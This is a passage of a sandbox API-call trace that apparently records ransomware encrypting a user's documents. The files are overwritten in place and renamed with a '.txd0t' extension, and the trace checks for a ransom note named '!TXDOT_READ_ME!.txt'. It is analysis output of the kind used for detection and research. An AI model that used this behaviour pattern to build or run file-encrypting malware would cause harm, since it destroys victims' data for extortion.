RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0xfa) returned 0xecfac8 [0073.997] StrCpyW (in: psz1=0xecfac8, psz2="\\\\?\\C:\\Users\\FD1HVy\\Documents\\6IKlp7h.ppt" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\6IKlp7h.ppt") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\6IKlp7h.ppt" [0073.997] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\6IKlp7h.ppt") returned="6IKlp7h.ppt" [0073.997] StrCpyW (in: psz1=0xecfb04, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0073.997] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\!TXDOT_READ_ME!.txt") returned 1 [0073.998] GetProcessHeap () returned 0xe30000 [0073.998] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xecfac8 | out: hHeap=0xe30000) returned 1 [0073.998] CloseHandle (hObject=0x47c) returned 1 [0073.999] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\6IKlp7h.ppt" (normalized: "c:\\users\\fd1hvy\\documents\\6iklp7h.ppt"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\6IKlp7h.ppt.txd0t" (normalized: "c:\\users\\fd1hvy\\documents\\6iklp7h.ppt.txd0t")) returned 1 [0074.002] SetEvent (hEvent=0x414) returned 1 [0074.002] WaitForSingleObject (hHandle=0x418, dwMilliseconds=0x3e8) returned 0x0 [0074.006] StrCpyW (in: psz1=0x53ef7b0, psz2="\\\\?\\C:\\Users\\FD1HVy\\Documents\\9H_Sl92NVVWuSvdwZJYh.pptx" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\9H_Sl92NVVWuSvdwZJYh.pptx") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\9H_Sl92NVVWuSvdwZJYh.pptx" [0074.006] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\9H_Sl92NVVWuSvdwZJYh.pptx", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\9H_Sl92NVVWuSvdwZJYh.pptx.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\9H_Sl92NVVWuSvdwZJYh.pptx.txd0t" [0074.006] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\9H_Sl92NVVWuSvdwZJYh.pptx.txd0t") returned 0 [0074.006] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\9H_Sl92NVVWuSvdwZJYh.pptx", dwFileAttributes=0x80) returned 1 [0074.013] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\9H_Sl92NVVWuSvdwZJYh.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\9h_sl92nvvwusvdwzjyh.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x460 [0074.013] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x53efd60 | out: lpFileSize=0x53efd60*=96977) returned 1 [0074.013] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0074.013] WriteFile (in: hFile=0x460, lpBuffer=0x53efa44*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x53efd5c, lpOverlapped=0x0 | out: lpBuffer=0x53efa44*, lpNumberOfBytesWritten=0x53efd5c*=0x200, lpOverlapped=0x0) returned 1 [0074.015] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xfffe832f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.015] ReadFile (in: hFile=0x460, lpBuffer=0x4aa0020, nNumberOfBytesToRead=0x17ad0, lpNumberOfBytesRead=0x53ef770, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesRead=0x53ef770*=0x17ad0, lpOverlapped=0x0) returned 1 [0074.017] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xfffe8530, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.017] WriteFile (in: hFile=0x460, lpBuffer=0x4aa0020*, nNumberOfBytesToWrite=0x17ad0, lpNumberOfBytesWritten=0x53ef774, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesWritten=0x53ef774*=0x17ad0, lpOverlapped=0x0) returned 1 [0074.020] FlushFileBuffers (hFile=0x460) returned 1 [0074.044] GetProcessHeap () returned 0xe30000 [0074.045] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x116) returned 0xed1ec0 [0074.045] StrCpyW (in: psz1=0xed1ec0, psz2="\\\\?\\C:\\Users\\FD1HVy\\Documents\\9H_Sl92NVVWuSvdwZJYh.pptx" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\9H_Sl92NVVWuSvdwZJYh.pptx") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\9H_Sl92NVVWuSvdwZJYh.pptx" [0074.045] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\9H_Sl92NVVWuSvdwZJYh.pptx") returned="9H_Sl92NVVWuSvdwZJYh.pptx" [0074.045] StrCpyW (in: psz1=0xed1efc, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0074.045] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\!TXDOT_READ_ME!.txt") returned 1 [0074.045] GetProcessHeap () returned 0xe30000 [0074.045] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed1ec0 | out: hHeap=0xe30000) returned 1 [0074.045] CloseHandle (hObject=0x460) returned 1 [0074.048] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\9H_Sl92NVVWuSvdwZJYh.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\9h_sl92nvvwusvdwzjyh.pptx"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\9H_Sl92NVVWuSvdwZJYh.pptx.txd0t" (normalized: "c:\\users\\fd1hvy\\documents\\9h_sl92nvvwusvdwzjyh.pptx.txd0t")) returned 1 [0074.048] SetEvent (hEvent=0x414) returned 1 [0074.048] WaitForSingleObject (hHandle=0x418, dwMilliseconds=0x3e8) returned 0x0 [0074.059] StrCpyW (in: psz1=0x53ef7b0, psz2="\\\\?\\C:\\Users\\FD1HVy\\Documents\\dMMktGSdsuA8JTH.docx" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\dMMktGSdsuA8JTH.docx") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\dMMktGSdsuA8JTH.docx" [0074.059] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\dMMktGSdsuA8JTH.docx", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\dMMktGSdsuA8JTH.docx.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\dMMktGSdsuA8JTH.docx.txd0t" [0074.059] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\dMMktGSdsuA8JTH.docx.txd0t") returned 0 [0074.059] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\dMMktGSdsuA8JTH.docx", dwFileAttributes=0x80) returned 1 [0074.059] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\dMMktGSdsuA8JTH.docx" (normalized: "c:\\users\\fd1hvy\\documents\\dmmktgsdsua8jth.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x47c [0074.059] GetFileSizeEx (in: hFile=0x47c, lpFileSize=0x53efd60 | out: lpFileSize=0x53efd60*=8283) returned 1 [0074.060] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0074.060] WriteFile (in: hFile=0x47c, lpBuffer=0x53efa44*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x53efd5c, lpOverlapped=0x0 | out: lpBuffer=0x53efa44*, lpNumberOfBytesWritten=0x53efd5c*=0x200, lpOverlapped=0x0) returned 1 [0074.060] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0xffffdda5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.060] ReadFile (in: hFile=0x47c, lpBuffer=0x4aa0020, nNumberOfBytesToRead=0x2050, lpNumberOfBytesRead=0x53ef770, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesRead=0x53ef770*=0x2050, lpOverlapped=0x0) returned 1 [0074.061] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0xffffdfb0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.061] WriteFile (in: hFile=0x47c, lpBuffer=0x4aa0020*, nNumberOfBytesToWrite=0x2050, lpNumberOfBytesWritten=0x53ef774, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesWritten=0x53ef774*=0x2050, lpOverlapped=0x0) returned 1 [0074.061] FlushFileBuffers (hFile=0x47c) returned 1 [0074.096] GetProcessHeap () returned 0xe30000 [0074.096] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x10c) returned 0xed29b8 [0074.096] StrCpyW (in: psz1=0xed29b8, psz2="\\\\?\\C:\\Users\\FD1HVy\\Documents\\dMMktGSdsuA8JTH.docx" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\dMMktGSdsuA8JTH.docx") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\dMMktGSdsuA8JTH.docx" [0074.096] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\dMMktGSdsuA8JTH.docx") returned="dMMktGSdsuA8JTH.docx" [0074.096] StrCpyW (in: psz1=0xed29f4, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0074.096] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\!TXDOT_READ_ME!.txt") returned 1 [0074.096] GetProcessHeap () returned 0xe30000 [0074.096] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed29b8 | out: hHeap=0xe30000) returned 1 [0074.096] CloseHandle (hObject=0x47c) returned 1 [0074.097] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\dMMktGSdsuA8JTH.docx" (normalized: "c:\\users\\fd1hvy\\documents\\dmmktgsdsua8jth.docx"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\dMMktGSdsuA8JTH.docx.txd0t" (normalized: "c:\\users\\fd1hvy\\documents\\dmmktgsdsua8jth.docx.txd0t")) returned 1 [0074.098] SetEvent (hEvent=0x414) returned 1 [0074.098] WaitForSingleObject (hHandle=0x418, dwMilliseconds=0x3e8) returned 0x0 [0074.101] StrCpyW (in: psz1=0x53ef7d0, psz2="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Md5Q.odt" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Md5Q.odt") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Md5Q.odt" [0074.101] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Md5Q.odt", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Md5Q.odt.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Md5Q.odt.txd0t" [0074.101] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Md5Q.odt.txd0t") returned 0 [0074.101] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Md5Q.odt", dwFileAttributes=0x80) returned 1 [0074.101] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Md5Q.odt" (normalized: "c:\\users\\fd1hvy\\documents\\md5q.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x47c [0074.102] GetFileSizeEx (in: hFile=0x47c, lpFileSize=0x53efd60 | out: lpFileSize=0x53efd60*=28302) returned 1 [0074.102] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0074.102] WriteFile (in: hFile=0x47c, lpBuffer=0x53efa44*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x53efd5c, lpOverlapped=0x0 | out: lpBuffer=0x53efa44*, lpNumberOfBytesWritten=0x53efd5c*=0x200, lpOverlapped=0x0) returned 1 [0074.104] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0xffff8f72, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.104] ReadFile (in: hFile=0x47c, lpBuffer=0x4aa0020, nNumberOfBytesToRead=0x6e80, lpNumberOfBytesRead=0x53ef790, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesRead=0x53ef790*=0x6e80, lpOverlapped=0x0) returned 1 [0074.104] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0xffff9180, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.105] WriteFile (in: hFile=0x47c, lpBuffer=0x4aa0020*, nNumberOfBytesToWrite=0x6e80, lpNumberOfBytesWritten=0x53ef794, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesWritten=0x53ef794*=0x6e80, lpOverlapped=0x0) returned 1 [0074.105] FlushFileBuffers (hFile=0x47c) returned 1 [0074.294] GetProcessHeap () returned 0xe30000 [0074.294] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0xf4) returned 0xe9d750 [0074.294] StrCpyW (in: psz1=0xe9d750, psz2="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Md5Q.odt" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Md5Q.odt") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Md5Q.odt" [0074.294] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Md5Q.odt") returned="Md5Q.odt" [0074.294] StrCpyW (in: psz1=0xe9d78c, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0074.294] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\!TXDOT_READ_ME!.txt") returned 1 [0074.294] GetProcessHeap () returned 0xe30000 [0074.294] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d750 | out: hHeap=0xe30000) returned 1 [0074.294] CloseHandle (hObject=0x47c) returned 1 [0074.295] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Md5Q.odt" (normalized: "c:\\users\\fd1hvy\\documents\\md5q.odt"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Md5Q.odt.txd0t" (normalized: "c:\\users\\fd1hvy\\documents\\md5q.odt.txd0t")) returned 1 [0074.296] SetEvent (hEvent=0x414) returned 1 [0074.296] WaitForSingleObject (hHandle=0x418, dwMilliseconds=0x3e8) returned 0x0 [0074.299] StrCpyW (in: psz1=0x53ef7b0, psz2="\\\\?\\C:\\Users\\FD1HVy\\Documents\\NUZN31jJgT6UykF_.ots" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\NUZN31jJgT6UykF_.ots") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\NUZN31jJgT6UykF_.ots" [0074.299] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\NUZN31jJgT6UykF_.ots", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\NUZN31jJgT6UykF_.ots.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\NUZN31jJgT6UykF_.ots.txd0t" [0074.299] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\NUZN31jJgT6UykF_.ots.txd0t") returned 0 [0074.299] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\NUZN31jJgT6UykF_.ots", dwFileAttributes=0x80) returned 1 [0074.299] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\NUZN31jJgT6UykF_.ots" (normalized: "c:\\users\\fd1hvy\\documents\\nuzn31jjgt6uykf_.ots"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x468 [0074.299] GetFileSizeEx (in: hFile=0x468, lpFileSize=0x53efd60 | out: lpFileSize=0x53efd60*=9071) returned 1 [0074.300] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0074.300] WriteFile (in: hFile=0x468, lpBuffer=0x53efa44*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x53efd5c, lpOverlapped=0x0 | out: lpBuffer=0x53efa44*, lpNumberOfBytesWritten=0x53efd5c*=0x200, lpOverlapped=0x0) returned 1 [0074.300] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0xffffda91, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.300] ReadFile (in: hFile=0x468, lpBuffer=0x4aa0020, nNumberOfBytesToRead=0x2360, lpNumberOfBytesRead=0x53ef770, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesRead=0x53ef770*=0x2360, lpOverlapped=0x0) returned 1 [0074.301] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0xffffdca0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.301] WriteFile (in: hFile=0x468, lpBuffer=0x4aa0020*, nNumberOfBytesToWrite=0x2360, lpNumberOfBytesWritten=0x53ef774, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesWritten=0x53ef774*=0x2360, lpOverlapped=0x0) returned 1 [0074.301] FlushFileBuffers (hFile=0x468) returned 1 [0074.309] GetProcessHeap () returned 0xe30000 [0074.309] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x10c) returned 0xed2d00 [0074.309] StrCpyW (in: psz1=0xed2d00, psz2="\\\\?\\C:\\Users\\FD1HVy\\Documents\\NUZN31jJgT6UykF_.ots" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\NUZN31jJgT6UykF_.ots") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\NUZN31jJgT6UykF_.ots" [0074.309] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\NUZN31jJgT6UykF_.ots") returned="NUZN31jJgT6UykF_.ots" [0074.309] StrCpyW (in: psz1=0xed2d3c, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0074.309] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\!TXDOT_READ_ME!.txt") returned 1 [0074.309] GetProcessHeap () returned 0xe30000 [0074.309] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed2d00 | out: hHeap=0xe30000) returned 1 [0074.309] CloseHandle (hObject=0x468) returned 1 [0074.310] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\NUZN31jJgT6UykF_.ots" (normalized: "c:\\users\\fd1hvy\\documents\\nuzn31jjgt6uykf_.ots"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\NUZN31jJgT6UykF_.ots.txd0t" (normalized: "c:\\users\\fd1hvy\\documents\\nuzn31jjgt6uykf_.ots.txd0t")) returned 1 [0074.310] SetEvent (hEvent=0x414) returned 1 [0074.310] WaitForSingleObject (hHandle=0x418, dwMilliseconds=0x3e8) returned 0x0 [0074.324] StrCpyW (in: psz1=0x53ef7c0, psz2="\\\\?\\C:\\Users\\FD1HVy\\Documents\\quCysrsmVF.pptx" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\quCysrsmVF.pptx") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\quCysrsmVF.pptx" [0074.324] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\quCysrsmVF.pptx", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\quCysrsmVF.pptx.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\quCysrsmVF.pptx.txd0t" [0074.324] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\quCysrsmVF.pptx.txd0t") returned 0 [0074.326] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\quCysrsmVF.pptx", dwFileAttributes=0x80) returned 1 [0074.326] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\quCysrsmVF.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\qucysrsmvf.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x464 [0074.326] GetFileSizeEx (in: hFile=0x464, lpFileSize=0x53efd60 | out: lpFileSize=0x53efd60*=59470) returned 1 [0074.326] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0074.326] WriteFile (in: hFile=0x464, lpBuffer=0x53efa44*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x53efd5c, lpOverlapped=0x0 | out: lpBuffer=0x53efa44*, lpNumberOfBytesWritten=0x53efd5c*=0x200, lpOverlapped=0x0) returned 1 [0074.327] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0xffff15b2, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.327] ReadFile (in: hFile=0x464, lpBuffer=0x4aa0020, nNumberOfBytesToRead=0xe840, lpNumberOfBytesRead=0x53ef780, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesRead=0x53ef780*=0xe840, lpOverlapped=0x0) returned 1 [0074.329] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0xffff17c0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.329] WriteFile (in: hFile=0x464, lpBuffer=0x4aa0020*, nNumberOfBytesToWrite=0xe840, lpNumberOfBytesWritten=0x53ef784, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesWritten=0x53ef784*=0xe840, lpOverlapped=0x0) returned 1 [0074.329] FlushFileBuffers (hFile=0x464) returned 1 [0074.350] GetProcessHeap () returned 0xe30000 [0074.350] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x102) returned 0xe9d750 [0074.350] StrCpyW (in: psz1=0xe9d750, psz2="\\\\?\\C:\\Users\\FD1HVy\\Documents\\quCysrsmVF.pptx" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\quCysrsmVF.pptx") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\quCysrsmVF.pptx" [0074.350] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\quCysrsmVF.pptx") returned="quCysrsmVF.pptx" [0074.350] StrCpyW (in: psz1=0xe9d78c, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0074.350] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\!TXDOT_READ_ME!.txt") returned 1 [0074.350] GetProcessHeap () returned 0xe30000 [0074.350] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d750 | out: hHeap=0xe30000) returned 1 [0074.350] CloseHandle (hObject=0x464) returned 1 [0074.353] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\quCysrsmVF.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\qucysrsmvf.pptx"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\quCysrsmVF.pptx.txd0t" (normalized: "c:\\users\\fd1hvy\\documents\\qucysrsmvf.pptx.txd0t")) returned 1 [0074.354] SetEvent (hEvent=0x414) returned 1 [0074.354] WaitForSingleObject (hHandle=0x418, dwMilliseconds=0x3e8) returned 0x0 [0074.364] StrCpyW (in: psz1=0x53ef7b0, psz2="\\\\?\\C:\\Users\\FD1HVy\\Documents\\spmR iwVLu JE 9B.rtf" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\spmR iwVLu JE 9B.rtf") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\spmR iwVLu JE 9B.rtf" [0074.364] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\spmR iwVLu JE 9B.rtf", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\spmR iwVLu JE 9B.rtf.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\spmR iwVLu JE 9B.rtf.txd0t" [0074.364] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\spmR iwVLu JE 9B.rtf.txd0t") returned 0 [0074.364] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\spmR iwVLu JE 9B.rtf", dwFileAttributes=0x80) returned 1 [0074.364] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\spmR iwVLu JE 9B.rtf" (normalized: "c:\\users\\fd1hvy\\documents\\spmr iwvlu je 9b.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x46c [0074.364] GetFileSizeEx (in: hFile=0x46c, lpFileSize=0x53efd60 | out: lpFileSize=0x53efd60*=52486) returned 1 [0074.364] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0074.364] WriteFile (in: hFile=0x46c, lpBuffer=0x53efa44*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x53efd5c, lpOverlapped=0x0 | out: lpBuffer=0x53efa44*, lpNumberOfBytesWritten=0x53efd5c*=0x200, lpOverlapped=0x0) returned 1 [0074.365] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0xffff30fa, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.365] ReadFile (in: hFile=0x46c, lpBuffer=0x4aa0020, nNumberOfBytesToRead=0xcd00, lpNumberOfBytesRead=0x53ef770, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesRead=0x53ef770*=0xcd00, lpOverlapped=0x0) returned 1 [0074.366] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0xffff3300, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.366] WriteFile (in: hFile=0x46c, lpBuffer=0x4aa0020*, nNumberOfBytesToWrite=0xcd00, lpNumberOfBytesWritten=0x53ef774, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesWritten=0x53ef774*=0xcd00, lpOverlapped=0x0) returned 1 [0074.367] FlushFileBuffers (hFile=0x46c) returned 1 [0074.381] GetProcessHeap () returned 0xe30000 [0074.381] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x10c) returned 0xed2558 [0074.382] StrCpyW (in: psz1=0xed2558, psz2="\\\\?\\C:\\Users\\FD1HVy\\Documents\\spmR iwVLu JE 9B.rtf" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\spmR iwVLu JE 9B.rtf") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\spmR iwVLu JE 9B.rtf" [0074.383] PathFindFileNameW 